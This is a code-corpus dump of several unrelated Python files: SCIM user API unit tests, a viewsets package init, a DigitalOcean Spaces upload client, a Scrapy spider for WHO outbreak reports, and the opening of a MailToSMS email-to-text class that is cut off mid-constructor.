content
stringlengths 0
1.05M
| origin
stringclasses 2
values | type
stringclasses 2
values |
|---|---|---|
import json
import logging
import unittest
from dataclasses import asdict, dataclass
from datetime import datetime, timedelta
from typing import Any, Dict, Mapping, Optional
from uuid import UUID, uuid4
import bson
from bson import ObjectId
from falcon.testing import Result
from eduid_userdb.testing import normalised_data
from eduid_scimapi.db.eventdb import EventStatus
from eduid_scimapi.db.userdb import ScimApiProfile, ScimApiUser
from eduid_scimapi.schemas.scimbase import Email, Meta, Name, PhoneNumber, SCIMResourceType, SCIMSchema
from eduid_scimapi.schemas.user import NutidUserExtensionV1, Profile, User, UserResponse, UserResponseSchema
from eduid_scimapi.testing import ScimApiTestCase
from eduid_scimapi.utils import filter_none, make_etag
logger = logging.getLogger(__name__)
class TestScimUser(unittest.TestCase):
def setUp(self) -> None:
self.maxDiff = None
self.user_doc1 = {
"_id": ObjectId("5e5542db34a4cf8015e62ac8"),
"scim_id": "9784e1bf-231b-4eb8-b315-52eb46dd7c4b",
"external_id": "hubba-bubba@eduid.se",
"name": {
"family_name": "Testsson",
"formatted": "Test Testsson",
"given_name": "Test",
"honorific_prefix": "Dr",
"honorific_suffix": "III",
"middle_name": "Testaren",
},
"emails": [{"primary": True, "type": "home", "value": "test@example.com"}],
"phone_numbers": [{"primary": True, "type": "mobile", "value": "tel:+1-202-456-1414"}],
"preferred_language": "en",
"version": ObjectId("5e5e6829f86abf66d341d4a2"),
"created": datetime.fromisoformat("2020-02-25T15:52:59.745"),
"last_modified": datetime.fromisoformat("2020-02-25T15:52:59.745"),
"profiles": {"student": {"attributes": {"displayName": "Test"}}},
}
def test_load_old_user(self):
user = ScimApiUser.from_dict(self.user_doc1)
self.assertEqual(user.profiles['student'].attributes['displayName'], 'Test')
# test to-dict+from-dict consistency
user2 = ScimApiUser.from_dict(user.to_dict())
self.assertEqual(asdict(user), asdict(user2))
def test_to_scimuser_doc(self):
db_user = ScimApiUser.from_dict(self.user_doc1)
meta = Meta(
location=f'http://example.org/Users/{db_user.scim_id}',
resource_type=SCIMResourceType.USER,
created=db_user.created,
last_modified=db_user.last_modified,
version=db_user.version,
)
user_response = UserResponse(
id=db_user.scim_id,
meta=meta,
external_id=db_user.external_id,
name=Name(**asdict(db_user.name)),
emails=[Email(**asdict(email)) for email in db_user.emails],
phone_numbers=[PhoneNumber(**asdict(number)) for number in db_user.phone_numbers],
preferred_language='en',
schemas=[SCIMSchema.CORE_20_USER, SCIMSchema.NUTID_USER_V1],
groups=[],
nutid_user_v1=NutidUserExtensionV1(
profiles={name: Profile(**asdict(profile)) for name, profile in db_user.profiles.items()}
),
)
scim = UserResponseSchema().dumps(user_response, sort_keys=True)
# Validation does not occur on serialization
UserResponseSchema().loads(scim)
expected = {
"emails": [{"primary": True, "type": "home", "value": "test@example.com"}],
"externalId": "hubba-bubba@eduid.se",
"groups": [],
SCIMSchema.NUTID_USER_V1.value: {
"profiles": {"student": {"attributes": {"displayName": "Test"}, "data": {}}},
},
"id": "9784e1bf-231b-4eb8-b315-52eb46dd7c4b",
"meta": {
"created": "2020-02-25T15:52:59.745000",
"lastModified": "2020-02-25T15:52:59.745000",
'location': f'http://example.org/Users/{db_user.scim_id}',
"resourceType": "User",
"version": "W/\"5e5e6829f86abf66d341d4a2\"",
},
"name": {
"familyName": "Testsson",
"formatted": "Test Testsson",
"givenName": "Test",
"honorificPrefix": "Dr",
"honorificSuffix": "III",
"middleName": "Testaren",
},
"phoneNumbers": [{"primary": True, "type": "mobile", "value": "tel:+1-202-456-1414"}],
"preferredLanguage": "en",
"schemas": [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
}
assert json.loads(scim) == expected
def test_to_scimuser_no_external_id(self):
user_doc2 = {
'_id': ObjectId('5e81c5f849ac2cd87580e500'),
'scim_id': 'a7851d21-eab9-4caa-ba5d-49653d65c452',
'version': ObjectId('5e81c5f849ac2cd87580e502'),
'created': datetime.fromisoformat('2020-03-30T10:12:08.528'),
'last_modified': datetime.fromisoformat('2020-03-30T10:12:08.531'),
'profiles': {'student': {'data': {}}},
}
db_user = ScimApiUser.from_dict(user_doc2)
meta = Meta(
location=f'http://example.org/Users/{db_user.scim_id}',
resource_type=SCIMResourceType.USER,
created=db_user.created,
last_modified=db_user.last_modified,
version=db_user.version,
)
user_response = UserResponse(
id=db_user.scim_id,
meta=meta,
schemas=[SCIMSchema.CORE_20_USER, SCIMSchema.NUTID_USER_V1],
external_id=db_user.external_id,
groups=[],
nutid_user_v1=NutidUserExtensionV1(
profiles={name: Profile(**asdict(profile)) for name, profile in db_user.profiles.items()}
),
)
scim = UserResponseSchema().dumps(user_response)
# Validation does not occur on serialization
UserResponseSchema().loads(scim)
expected = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
"id": "a7851d21-eab9-4caa-ba5d-49653d65c452",
"phoneNumbers": [],
SCIMSchema.NUTID_USER_V1.value: {"profiles": {"student": {"data": {}, "attributes": {}}}},
"meta": {
"version": "W/\"5e81c5f849ac2cd87580e502\"",
"created": "2020-03-30T10:12:08.528000",
"resourceType": "User",
"lastModified": "2020-03-30T10:12:08.531000",
'location': f'http://example.org/Users/{db_user.scim_id}',
},
"name": {},
"groups": [],
"emails": [],
}
assert json.loads(scim) == expected
def test_bson_serialization(self):
user = ScimApiUser.from_dict(self.user_doc1)
x = bson.encode(user.to_dict())
self.assertTrue(x)
@dataclass
class UserApiResult:
request: Mapping[str, Any]
result: Result
nutid_user: NutidUserExtensionV1
response: UserResponse
class TestUserResource(ScimApiTestCase):
def setUp(self) -> None:
super().setUp()
self.test_profile = ScimApiProfile(attributes={'displayName': 'Test User 1'}, data={'test_key': 'test_value'})
def _assertUserUpdateSuccess(self, req: Mapping, response, user: ScimApiUser):
""" Function to validate successful responses to SCIM calls that update a user according to a request. """
if response.json.get('schemas') == [SCIMSchema.ERROR.value]:
self.fail(f'Got SCIM error response ({response.status}):\n{response.json}')
expected_schemas = req.get('schemas', [SCIMSchema.CORE_20_USER.value])
if SCIMSchema.NUTID_USER_V1.value in response.json and SCIMSchema.NUTID_USER_V1.value not in expected_schemas:
# The API can always add this extension to the response, even if it was not in the request
expected_schemas += [SCIMSchema.NUTID_USER_V1.value]
self._assertScimResponseProperties(response, resource=user, expected_schemas=expected_schemas)
# Validate user update specifics
assert user.external_id == response.json.get('externalId'), 'user.externalId != response.json.get("externalId")'
self._assertName(user.name, response.json.get('name'))
_expected_emails = filter_none(normalised_data([email.to_dict() for email in user.emails]))
_obtained_emails = filter_none(normalised_data(response.json.get('emails', [])))
assert _obtained_emails == _expected_emails, 'response.json.get("email") != user.emails'
_expected_phones = filter_none(normalised_data([number.to_dict() for number in user.phone_numbers]))
_obtained_phones = filter_none(normalised_data(response.json.get('phoneNumbers', [])))
assert _obtained_phones == _expected_phones, 'response.json.get("phoneNumbers") != user.phone_numbers'
assert user.preferred_language == response.json.get(
'preferredLanguage'
), 'user.preferred_language != response.json.get("preferredLanguage")'
# If the request has NUTID profiles, ensure they are present in the response
if SCIMSchema.NUTID_USER_V1.value in req:
req_nutid = req[SCIMSchema.NUTID_USER_V1.value]
resp_nutid = response.json.get(SCIMSchema.NUTID_USER_V1.value)
self.assertEqual(
req_nutid, resp_nutid, 'Unexpected NUTID user data in response',
)
elif SCIMSchema.NUTID_USER_V1.value in response.json:
self.fail(f'Unexpected {SCIMSchema.NUTID_USER_V1.value} in the response')
# TODO: Should we implement this?
# def test_get_users(self):
# for i in range(9):
# self.add_user(identifier=str(uuid4()), external_id=f'test-id-{i}', profiles={'test': self.test_profile})
# response = self.client.simulate_get(path=f'/Users', headers=self.headers)
# self.assertEqual([SCIMSchema.API_MESSAGES_20_LIST_RESPONSE.value], response.json.get('schemas'))
# resources = response.json.get('Resources')
# self.assertEqual(self.userdb.db_count(), len(resources))
def _create_user(self, req: Dict[str, Any], expect_success: bool = True) -> UserApiResult:
if 'schemas' not in req:
_schemas = [SCIMSchema.CORE_20_USER.value]
if SCIMSchema.NUTID_USER_V1.value in req:
_schemas += [SCIMSchema.NUTID_USER_V1.value]
req['schemas'] = _schemas
result = self.client.simulate_post(path='/Users/', body=self.as_json(req), headers=self.headers)
if expect_success:
self._assertResponse(result, status_code=201)
response: UserResponse = UserResponseSchema().load(result.json)
return UserApiResult(request=req, nutid_user=response.nutid_user_v1, result=result, response=response)
def _update_user(
self, req: Dict[str, Any], scim_id: UUID, version: Optional[ObjectId], expect_success: bool = True
) -> UserApiResult:
if 'schemas' not in req:
_schemas = [SCIMSchema.CORE_20_USER.value]
if SCIMSchema.NUTID_USER_V1.value in req:
_schemas += [SCIMSchema.NUTID_USER_V1.value]
req['schemas'] = _schemas
if 'id' not in req:
req['id'] = str(scim_id)
_headers = dict(self.headers) # copy
if version:
_headers['IF-MATCH'] = make_etag(version)
result = self.client.simulate_put(path=f'/Users/{scim_id}', body=self.as_json(req), headers=_headers)
if expect_success:
self._assertResponse(result)
response: UserResponse = UserResponseSchema().load(result.json)
return UserApiResult(request=req, nutid_user=response.nutid_user_v1, result=result, response=response)
def test_get_user(self):
db_user = self.add_user(identifier=str(uuid4()), external_id='test-id-1', profiles={'test': self.test_profile})
response = self.client.simulate_get(path=f'/Users/{db_user.scim_id}', headers=self.headers)
_req = {SCIMSchema.NUTID_USER_V1.value: {'profiles': {'test': asdict(self.test_profile)}}}
self._assertUserUpdateSuccess(_req, response, db_user)
def test_create_users_with_no_external_id(self):
self.add_user(identifier=str(uuid4()), profiles={'test': self.test_profile})
self.add_user(identifier=str(uuid4()), profiles={'test': self.test_profile})
def test_create_user(self):
req = {
'externalId': 'test-id-1',
'name': {'familyName': 'Testsson', 'givenName': 'Test', 'middleName': 'Testaren'},
'emails': [{'primary': True, 'type': 'home', 'value': 'test@example.com'}],
'phoneNumbers': [{'primary': True, 'type': 'mobile', 'value': 'tel:+1-202-456-1414'}],
'preferredLanguage': 'en',
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'Test User 1'}, 'data': {'test_key': 'test_value'}}
},
},
}
result = self._create_user(req)
# Load the created user from the database, ensuring it was in fact created
db_user = self.userdb.get_user_by_external_id(req['externalId'])
self.assertIsNotNone(db_user, 'Created user not found in the database')
self._assertUserUpdateSuccess(result.request, result.result, db_user)
# check that the action resulted in an event in the database
events = self.eventdb.get_events_by_resource(SCIMResourceType.USER, db_user.scim_id)
assert len(events) == 1
event = events[0]
assert event.resource.external_id == req['externalId']
assert event.data['status'] == EventStatus.CREATED.value
def test_create_and_update_user(self):
""" Test that creating a user and then updating it without changes only results in one event """
req = {
'externalId': 'test-id-1',
'name': {'familyName': 'Testsson', 'givenName': 'Test', 'middleName': 'Testaren'},
'emails': [{'primary': True, 'type': 'home', 'value': 'test@example.com'}],
'phoneNumbers': [{'primary': True, 'type': 'mobile', 'value': 'tel:+1-202-456-1414'}],
'preferredLanguage': 'en',
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'Test User 1'}, 'data': {'test_key': 'test_value'}}
},
},
}
result1 = self._create_user(req)
# check that the action resulted in an event in the database
events1 = self.eventdb.get_events_by_resource(SCIMResourceType.USER, result1.response.id)
assert len(events1) == 1
event = events1[0]
assert event.resource.external_id == req['externalId']
assert event.data['status'] == EventStatus.CREATED.value
# Update the user without making any changes
result2 = self._update_user(req, result1.response.id, result1.response.meta.version)
# Make sure the version wasn't updated
assert result1.response.meta.version == result2.response.meta.version
# Make sure no additional event was created
events2 = self.eventdb.get_events_by_resource(SCIMResourceType.USER, result2.response.id)
assert len(events2) == 1
assert events1 == events2
def test_create_user_no_external_id(self):
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'Test User 1'}, 'data': {'test_key': 'test_value'}}
},
},
}
response = self.client.simulate_post(path='/Users/', body=self.as_json(req), headers=self.headers)
self._assertResponse(response, status_code=201)
# Load the created user from the database, ensuring it was in fact created
db_user = self.userdb.get_user_by_scim_id(response.json['id'])
self.assertIsNotNone(db_user, 'Created user not found in the database')
self._assertUserUpdateSuccess(req, response, db_user)
def test_create_user_duplicated_external_id(self):
external_id = 'test-id-1'
# Create an existing user in the db
self.add_user(identifier=str(uuid4()), external_id=external_id, profiles={'test': self.test_profile})
# Try to create a new user with the same external_id
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
'externalId': external_id,
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {'test': {'attributes': {'displayName': 'Test User 2'}, 'data': {'test_key': 'test_value'}}}
},
}
response = self.client.simulate_post(path='/Users/', body=self.as_json(req), headers=self.headers)
self._assertScimError(
response.json, schemas=['urn:ietf:params:scim:api:messages:2.0:Error'], detail='externalID must be unique'
)
def test_update_user(self):
db_user = self.add_user(identifier=str(uuid4()), external_id='test-id-1', profiles={'test': self.test_profile})
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
'id': str(db_user.scim_id),
'externalId': 'test-id-1',
'name': {'familyName': 'Testsson', 'givenName': 'Test', 'middleName': 'Testaren'},
'emails': [{'primary': True, 'type': 'home', 'value': 'test@example.com'}],
'phoneNumbers': [{'primary': True, 'type': 'mobile', 'value': 'tel:+1-202-456-1414'}],
'preferredLanguage': 'en',
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'New display name'}, 'data': {'test_key': 'new value'}}
},
},
}
self.headers['IF-MATCH'] = make_etag(db_user.version)
response = self.client.simulate_put(
path=f'/Users/{db_user.scim_id}', body=self.as_json(req), headers=self.headers
)
self._assertResponse(response)
db_user = self.userdb.get_user_by_scim_id(response.json['id'])
self._assertUserUpdateSuccess(req, response, db_user)
# check that the action resulted in an event in the database
events = self.eventdb.get_events_by_resource(SCIMResourceType.USER, db_user.scim_id)
assert len(events) == 1
event = events[0]
assert event.resource.external_id == req['externalId']
assert event.data['status'] == EventStatus.UPDATED.value
def test_update_user_change_properties(self):
# Create the user
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
'externalId': 'test-id-1',
'name': {'familyName': 'Testsson', 'givenName': 'Test', 'middleName': 'Testaren'},
'emails': [{'primary': True, 'type': 'home', 'value': 'test@example.com'}],
'phoneNumbers': [{'primary': True, 'type': 'mobile', 'value': 'tel:+1-202-456-1414'}],
'preferredLanguage': 'en',
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'Test User 1'}, 'data': {'test_key': 'test_value'}}
},
},
}
create_response = self.client.simulate_post(path='/Users/', body=self.as_json(req), headers=self.headers)
self._assertResponse(create_response, status_code=201)
# Update the user
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
'id': create_response.json['id'],
'externalId': 'test-id-1',
'name': {'familyName': 'Testsson', 'givenName': 'Test', 'middleName': 'T'},
'emails': [{'primary': True, 'type': 'home', 'value': 'test2@example.com'}],
'phoneNumbers': [{'primary': True, 'type': 'mobile', 'value': 'tel:+5-555-555'}],
'preferredLanguage': 'sv-SE',
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {
'attributes': {'displayName': 'Another display name'},
'data': {'test_key': 'another value'},
}
},
},
}
self.headers['IF-MATCH'] = create_response.headers['etag']
response = self.client.simulate_put(
path=f'/Users/{create_response.json["id"]}', body=self.as_json(req), headers=self.headers
)
self._assertResponse(response)
db_user = self.userdb.get_user_by_scim_id(response.json['id'])
self._assertUserUpdateSuccess(req, response, db_user)
def test_update_user_set_external_id(self):
db_user = self.add_user(identifier=str(uuid4()), profiles={'test': self.test_profile})
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
'id': str(db_user.scim_id),
'externalId': 'test-id-1',
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'New display name'}, 'data': {'test_key': 'new value'}}
},
},
}
self.headers['IF-MATCH'] = make_etag(db_user.version)
response = self.client.simulate_put(
path=f'/Users/{db_user.scim_id}', body=self.as_json(req), headers=self.headers
)
self._assertResponse(response)
db_user = self.userdb.get_user_by_scim_id(response.json['id'])
self._assertUserUpdateSuccess(req, response, db_user)
def test_update_user_duplicated_external_id(self):
external_id = 'test-id-1'
# Create two existing users with different external_id
self.add_user(identifier=str(uuid4()), external_id=external_id, profiles={'test': self.test_profile})
db_user = self.add_user(identifier=str(uuid4()), external_id='test-id-2', profiles={'test': self.test_profile})
# Try to update the second user with the external_id of the first
req = {
'schemas': [SCIMSchema.CORE_20_USER.value, SCIMSchema.NUTID_USER_V1.value],
'id': str(db_user.scim_id),
'externalId': external_id,
SCIMSchema.NUTID_USER_V1.value: {
'profiles': {
'test': {'attributes': {'displayName': 'New display name'}, 'data': {'test_key': 'new value'}}
}
},
}
self.headers['IF-MATCH'] = make_etag(db_user.version)
response = self.client.simulate_put(
path=f'/Users/{db_user.scim_id}', body=self.as_json(req), headers=self.headers
)
self._assertScimError(
response.json, schemas=['urn:ietf:params:scim:api:messages:2.0:Error'], detail='externalID must be unique'
)
def test_search_user_external_id(self):
db_user = self.add_user(identifier=str(uuid4()), external_id='test-id-1', profiles={'test': self.test_profile})
self.add_user(identifier=str(uuid4()), external_id='test-id-2', profiles={'test': self.test_profile})
self._perform_search(filter=f'externalId eq "{db_user.external_id}"', expected_user=db_user)
def test_search_user_last_modified(self):
db_user1 = self.add_user(identifier=str(uuid4()), external_id='test-id-1', profiles={'test': self.test_profile})
db_user2 = self.add_user(identifier=str(uuid4()), external_id='test-id-2', profiles={'test': self.test_profile})
self.assertGreater(db_user2.last_modified, db_user1.last_modified)
self._perform_search(
filter=f'meta.lastModified ge "{db_user1.last_modified.isoformat()}"',
expected_num_resources=2,
expected_total_results=2,
)
self._perform_search(
filter=f'meta.lastModified gt "{db_user1.last_modified.isoformat()}"', expected_user=db_user2
)
def test_search_user_start_index(self):
for i in range(9):
self.add_user(identifier=str(uuid4()), external_id=f'test-id-{i}', profiles={'test': self.test_profile})
self.assertEqual(9, self.userdb.db_count())
last_modified = datetime.utcnow() - timedelta(hours=1)
self._perform_search(
filter=f'meta.lastmodified gt "{last_modified.isoformat()}"',
start=5,
return_json=True,
expected_num_resources=5,
expected_total_results=9,
)
def test_search_user_count(self):
for i in range(9):
self.add_user(identifier=str(uuid4()), external_id=f'test-id-{i}', profiles={'test': self.test_profile})
self.assertEqual(9, self.userdb.db_count())
last_modified = datetime.utcnow() - timedelta(hours=1)
self._perform_search(
filter=f'meta.lastmodified gt "{last_modified.isoformat()}"',
count=5,
return_json=True,
expected_num_resources=5,
expected_total_results=9,
)
def test_search_user_start_index_and_count(self):
for i in range(9):
self.add_user(identifier=str(uuid4()), external_id=f'test-id-{i}', profiles={'test': self.test_profile})
self.assertEqual(9, self.userdb.db_count())
last_modified = datetime.utcnow() - timedelta(hours=1)
self._perform_search(
filter=f'meta.lastmodified gt "{last_modified.isoformat()}"',
start=7,
count=5,
return_json=True,
expected_num_resources=3,
expected_total_results=9,
)
def _perform_search(
self,
filter: str,
start: int = 1,
count: int = 10,
return_json: bool = False,
expected_user: Optional[ScimApiUser] = None,
expected_num_resources: Optional[int] = None,
expected_total_results: Optional[int] = None,
):
logger.info(f'Searching for group(s) using filter {repr(filter)}')
req = {
'schemas': [SCIMSchema.API_MESSAGES_20_SEARCH_REQUEST.value],
'filter': filter,
'startIndex': start,
'count': count,
}
response = self.client.simulate_post(path='/Users/.search', body=self.as_json(req), headers=self.headers)
logger.info(f'Search response:\n{response.json}')
if return_json:
return response.json
self._assertResponse(response)
expected_schemas = [SCIMSchema.API_MESSAGES_20_LIST_RESPONSE.value]
response_schemas = response.json.get('schemas')
self.assertIsInstance(response_schemas, list, 'Response schemas not present, or not a list')
self.assertEqual(
sorted(set(expected_schemas)), sorted(set(response_schemas)), 'Unexpected schema(s) in search response'
)
resources = response.json.get('Resources')
if expected_user is not None:
expected_num_resources = 1
expected_total_results = 1
if expected_num_resources is not None:
self.assertEqual(
expected_num_resources,
len(resources),
f'Number of resources returned expected to be {expected_num_resources}',
)
if expected_total_results is None:
expected_total_results = expected_num_resources
if expected_total_results is not None:
self.assertEqual(
expected_total_results,
response.json.get('totalResults'),
f'Response totalResults expected to be {expected_total_results}',
)
if expected_user is not None:
self.assertEqual(
str(expected_user.scim_id),
resources[0].get('id'),
f'Search response user does not have the expected id: {str(expected_user.scim_id)}',
)
self.assertEqual([SCIMSchema.API_MESSAGES_20_LIST_RESPONSE.value], response.json.get('schemas'))
resources = response.json.get('Resources')
return resources
|
nilq/baby-python
|
python
|
# flake8: noqa
from .serializers import ViewSetSerializer
from .views import (
ViewSetCreateView, ViewSetDeleteView, ViewSetDetailView, ViewSetIndexView,
ViewSetListView, ViewSetUpdateView
)
from .viewsets import ModelViewSet, ViewSet
__version__ = '0.1.6'
default_app_config = 'viewsets.apps.ViewsetsConfig'
|
nilq/baby-python
|
python
|
import uuid
import boto3
from botocore.exceptions import ClientError
from busy_beaver.config import (
DIGITALOCEAN_SPACES_BASE_URL,
DIGITALOCEAN_SPACES_BUCKET_NAME,
DIGITALOCEAN_SPACES_ENDPOINT_URL,
DIGITALOCEAN_SPACES_REGION_NAME,
LOGOS_FOLDER,
)
class S3Client:
def __init__(self, client_key, client_secret):
session = boto3.session.Session()
self.client = session.client(
"s3",
region_name=DIGITALOCEAN_SPACES_REGION_NAME,
endpoint_url=DIGITALOCEAN_SPACES_ENDPOINT_URL,
aws_access_key_id=client_key,
aws_secret_access_key=client_secret,
)
def find_bucket(self, bucket):
try:
self.client.head_bucket(Bucket=bucket)
except ClientError:
return False
return True
def create_bucket(self, bucket):
try:
self.client.create_bucket(Bucket=bucket, ACL="public-read")
except ClientError:
return False
return True
def delete_bucket(self, bucket):
try:
self.client.delete_bucket(Bucket=bucket)
except ClientError:
return False
return True
def upload_logo(self, filelike_object):
extension = filelike_object.filename.split(".")[-1]
filepath = f"{LOGOS_FOLDER}/{str(uuid.uuid4())}.{extension}"
response = self.client.put_object(
Bucket=DIGITALOCEAN_SPACES_BUCKET_NAME,
Body=filelike_object,
ACL="public-read",
Key=filepath,
)
status_code = response["ResponseMetadata"]["HTTPStatusCode"]
if status_code != 200:
raise Exception(
"Raise a FormValidation error; or maybe a different error to let me "
"know something went wrong and try again"
)
url = self._generate_url(filepath)
return url
def _generate_url(self, filepath):
return (
f"{DIGITALOCEAN_SPACES_BASE_URL}/"
f"{DIGITALOCEAN_SPACES_BUCKET_NAME}/"
f"{filepath}"
)
|
nilq/baby-python
|
python
|
import scrapy
import json
from bs4 import BeautifulSoup
import re
import datetime
import logging
logging.basicConfig(filename='Error.log', level=logging.CRITICAL, format='%(asctime)s:%(levelname)s:%(name)s:%(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')
from PHASE_1.API_SourceCode.keyterms.key_terms import get_key_terms
from PHASE_1.API_SourceCode.disease.diseaseExtractor import diseaseExtractor
from PHASE_1.API_SourceCode.disease.syndromeExtractor import syndromeExtractor
from PHASE_1.API_SourceCode.dateparse.event_date import get_event_date
from PHASE_1.API_SourceCode.googlemaps.getPlaces import getPlaces, get_country
from PHASE_1.API_SourceCode.database.db import db_insert, db_urls
class WHOSpider(scrapy.Spider):
name = "WHO"
start_urls = [
'https://www.who.int/csr/don/archive/year/en/',
]
def parse(self, response):
years = response.css('div.col_2-1_1 ul li a::attr(href)').getall()
for year in years:
year = response.urljoin(year)
yield scrapy.Request(year, callback = self.parse_each_year)
def parse_each_year(self, response):
articleLinks = response.css('ul.auto_archive li a::attr(href)').getall()
urls = db_urls()
for articleLink in articleLinks:
articleLink = response.urljoin(articleLink)
if articleLink in urls:
continue
yield scrapy.Request(articleLink, callback = self.parse_individual_links)
def parse_individual_links(self, response):
soup = BeautifulSoup(response.body, 'html.parser')
headline = soup.find("h1", {"class": "headline"}).getText()
main_text = soup.find("div", {"id": "primary"})
year = int(response.xpath("//meta[@name='webit_cover_date']/@content")[0].extract()[0:4])
month = int(response.xpath("//meta[@name='webit_cover_date']/@content")[0].extract()[5:7])
day = int(response.xpath("//meta[@name='webit_cover_date']/@content")[0].extract()[8:10])
d1 = datetime.datetime(year, month, day)
d2 = datetime.datetime(2008, 3, 18)
if (d1 <= d2):
remove = main_text.find("p")
if (remove):
remove.decompose()
remove = main_text.find_all("div")
for div in remove:
div.decompose()
remove = main_text.find("ul", {"class": "list_dash"})
if (remove):
remove.decompose()
remove = main_text.find("em", {"class": "dateline"})
if (remove):
remove.decompose()
for h1 in main_text.find_all('h1'):
h1.decompose()
for h2 in main_text.find_all('h2'):
h2.decompose()
for h3 in main_text.find_all('h3'):
h3.decompose()
for h4 in main_text.find_all('h4'):
h4.decompose()
for h5 in main_text.find_all('h5'):
h5.decompose()
for h6 in main_text.find_all('h6'):
h6.decompose()
main_text = main_text.getText()
#Remove caption maybe 1 or more * followed by text
main_text = re.sub("\*+.*\.", '', main_text)
#Remove sources with Source: ....
main_text = re.sub("Source: .*\S", '', main_text)
main_text = re.sub('\n', ' ', main_text)
main_text = re.sub('\t', ' ', main_text)
main_text = re.sub('\r', ' ', main_text)
main_text = re.sub(' +', ' ', main_text)
url = response.url
date_of_publication = response.xpath("//meta[@name='webit_cover_date']/@content")[0].extract()
headline = headline.strip()
main_text = main_text.strip()
data = {
'url': url,
'date_of_publication': date_of_publication,
'headline': headline,
'main_text': main_text
}
try:
diseases = diseaseExtractor(main_text, headline, date_of_publication)
syndromes = syndromeExtractor(main_text)
event_date = get_event_date(main_text, date_of_publication)
country = get_country(headline)
locations = getPlaces(main_text, [country])
report = {
'diseases': diseases,
'syndromes': syndromes,
'event_date': event_date,
'locations': locations
}
key_terms = get_key_terms(headline, main_text)
data['key_terms'] = list(set(key_terms + diseases + syndromes))
data['reports'] = [report]
db_insert(data)
except Exception as e:
logging.critical("%s %s %s" % (date_of_publication, url, e))
# filename = response.xpath("//meta[@name='webit_cover_date']/@content")[0].extract() + " " + headline
# filename = filename.replace('/', " ")
# with open(filename + ".json", 'w') as outfile:
# json.dump(data, outfile, ensure_ascii = False)
|
nilq/baby-python
|
python
|
from __future__ import print_function
import json
import os
import yagmail
import phonenumbers
class MailToSMS:
"""MailToSMS
This module implements a basic api for sending text messages via email using yagmail.
Arguments:
number {string|int}: The destination phone number (ex. 5551234567)
carrier {string}: The destination phone number's carrier (ex. "att")
username {string} [optional]: The username for accessing the SMTP server (ex. "username").
If omitted, it'll try to use the username stored in the .yagmail file.
See: https://github.com/kootenpv/yagmail#username-and-password
password {string} [optional]: The password for accessing the SMTP server (ex. "password").
If using Gmail and 2FA, you may want to use an app password.
If omitted, it'll try to use yagmail's password in the keyring, otherwise it'll prompt you for the password.
See: https://github.com/kootenpv/yagmail#username-and-password
contents {yagmail contents} [optional]: A yagmail friendly contents argument (ex. "This is a message.").
See: https://github.com/kootenpv/yagmail#magical-contents
If omitted, you can manually use MailToSMS's send method.
keyworded args (for extra configuration):
quiet {boolean}: Choose to disable printed statements. Defaults to False. (ex. quiet=True)
region {string}: The region of the destination phone number. Defaults to "US". (ex. region="US")
This should only be necessary when using a non international phone number that's not US based.
See: https://github.com/daviddrysdale/python-phonenumbers
mms {boolean}: Choose to send a MMS message instead of a SMS message, but will fallback to SMS if MMS isn't present. Defaults to False. (ex. mms=True)
subject {string}: The subject of the email to send (ex. subject="This is a subject.")
yagmail {list}: A list of arguments to send to the yagmail.SMTP() constructor. (ex. yagmail=["my.smtp.server.com", "12345"])
As of 4/30/17, the args and their defaults (after the username and password) are:
host='smtp.gmail.com', port='587', smtp_starttls=True, smtp_set_debuglevel=0, smtp_skip_login=False, encoding="utf-8"
This is unnecessary if you're planning on using the basic Gmail interface,
in which case you'll just need the username and password.
See: https://github.com/kootenpv/yagmail/blob/master/yagmail/yagmail.py#L49
Examples:
from mail_to_sms import MailToSMS
MailToSMS(5551234567, "att", "username@gmail.com", "password", "this is a message")
MailToSMS("5551234567", "att", "username", "password", ["hello", "world"], subject="hey!")
MailToSMS(5551234567, "att", "username", "password", "hello world!", yagmail=["smtp.gmail.com", "587"])
MailToSMS("5551234567", "att", "username@gmail.com", "password", ["line one"], yagmail=["smtp.gmail.com"])
mail = MailToSMS(5551234567, "att", "username", "password")
mail.send("this is a string!")
Requirements:
yagmail
phonenumbers
click (for the CLI)
"""
## Config
GATEWAYS_JSON_PATH = os.path.join(os.path.dirname(__file__), "gateways.json")
GATEWAYS_KEY = "gateways"
CARRIER_KEY = "carrier"
SMS_KEY = "sms"
MMS_KEY = "mms"
QUIET_KEY = "quiet"
REGION_KEY = "region"
SUBJECT_KEY = "subject"
YAGMAIL_KEY = "yagmail"
## Defaults
DEFAULT_QUIET = False
DEFAULT_TO_MMS = False
DEFAULT_REGION = "US"
DEFAULT_SUBJECT = None
DEFAULT_YAGMAIL_ARGS = []
def __init__(self, number, carrier, username=None, password=None, contents=None, **kwargs):
## Explicitly define the available configs and their defaults (if necessary)
self.config = {
"quiet": kwargs.get(self.QUIET_KEY, self.DEFAULT_QUIET),
"region": kwargs.get(self.REGION_KEY, self.DEFAULT_REGION),
"subject": kwargs.get(self.SUBJECT_KEY, self.DEFAULT_SUBJECT),
"mms": kwargs.get(self.MMS_KEY, self.DEFAULT_TO_MMS),
"yagmail": kwargs.get(self.YAGMAIL_KEY, self.DEFAULT_YAGMAIL_ARGS)
}
## Prepare the address to send to, return if it couldn't be generated
self.address = self._build_address(number, carrier)
if(not self.address):
return
## Prepare the passthru args for yagmail
yagmail_args = self.config["yagmail"]
if(username):
